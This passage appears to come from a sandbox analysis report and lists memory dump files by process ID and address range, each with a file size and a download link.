memory/5020-392-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5024-3001-0x00000000006D0000-0x00000000006E4000-memory.dmp

Filesize
80KB

Download
memory/5136-494-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5284-433-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5352-532-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5376-272-0x0000000000160000-0x0000000000200000-memory.dmp

Filesize
640KB

Download
memory/5376-273-0x00000000021F0000-0x0000000002288000-memory.dmp

Filesize
608KB

Download
memory/5424-2772-0x0000000000930000-0x0000000000944000-memory.dmp

Filesize
80KB

Download
memory/5612-444-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5620-4012-0x0000000000C70000-0x0000000000C84000-memory.dmp

Filesize
80KB

Download
memory/5636-373-0x000001A8F2C10000-0x000001A8F2CAA000-memory.dmp

Filesize
616KB

Download
memory/5636-375-0x00007FF833CE0000-0x00007FF833D9E000-memory.dmp

Filesize
760KB

Download
memory/5636-374-0x00007FF835B10000-0x00007FF835D05000-memory.dmp

Filesize
2.0MB

Download
memory/5732-3334-0x0000000000BC0000-0x0000000000BD4000-memory.dmp

Filesize
80KB

Download
memory/5736-3214-0x0000000000140000-0x0000000000154000-memory.dmp

Filesize
80KB

Download
memory/5748-3547-0x00000000001A0000-0x00000000001B4000-memory.dmp

Filesize
80KB

Download
memory/5764-506-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5884-3138-0x0000000000290000-0x00000000002A4000-memory.dmp

Filesize
80KB

Download
memory/5912-377-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5912-380-0x00007FF833CE0000-0x00007FF833D9E000-memory.dmp

Filesize
760KB

Download
memory/5912-379-0x00007FF835B10000-0x00007FF835D05000-memory.dmp

Filesize
2.0MB

Download
memory/5912-378-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5912-1322-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5968-464-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/5972-2684-0x0000000000F80000-0x0000000000F94000-memory.dmp

Filesize
80KB

Download
memory/6288-2399-0x0000000000AC0000-0x0000000000AD4000-memory.dmp

Filesize
80KB

Download
memory/6480-2879-0x0000000000F90000-0x0000000000FA4000-memory.dmp

Filesize
80KB

Download
memory/6540-2228-0x0000000000700000-0x0000000000714000-memory.dmp

Filesize
80KB

Download
memory/6620-3364-0x00000000008B0000-0x00000000008C4000-memory.dmp

Filesize
80KB

Download
memory/6672-4059-0x0000000000560000-0x0000000000574000-memory.dmp

Filesize
80KB

Download
memory/6676-2464-0x0000000000650000-0x0000000000664000-memory.dmp

Filesize
80KB

Download
memory/6688-3097-0x0000000000E80000-0x0000000000E94000-memory.dmp

Filesize
80KB

Download
memory/6724-2250-0x00000000000A0000-0x00000000000B4000-memory.dmp

Filesize
80KB

Download
memory/6804-2849-0x0000000000B20000-0x0000000000B34000-memory.dmp

Filesize
80KB

Download
memory/6960-3903-0x00000000005B0000-0x00000000005C4000-memory.dmp

Filesize
80KB

Download
memory/7048-2153-0x00000000000A0000-0x00000000000B4000-memory.dmp

Filesize
80KB

Download
memory/7116-3059-0x0000000000150000-0x0000000000164000-memory.dmp

Filesize
80KB

Download
memory/7504-2552-0x0000000000BE0000-0x0000000000BF4000-memory.dmp

Filesize
80KB

Download
memory/7628-2588-0x0000000000760000-0x0000000000774000-memory.dmp

Filesize
80KB

Download
memory/7704-4173-0x0000000000010000-0x0000000000024000-memory.dmp

Filesize
80KB

Download
memory/7752-2654-0x0000000000F10000-0x0000000000F24000-memory.dmp

Filesize
80KB

Download
memory/7964-3315-0x0000000000E40000-0x0000000000E54000-memory.dmp

Filesize
80KB

Download
memory/8100-2494-0x0000000000580000-0x0000000000594000-memory.dmp

Filesize
80KB

Download
memory/8124-2743-0x0000000000D60000-0x0000000000D74000-memory.dmp

Filesize
80KB

Download
memory/8176-3423-0x00000000004C0000-0x00000000004D4000-memory.dmp

Filesize
80KB

Download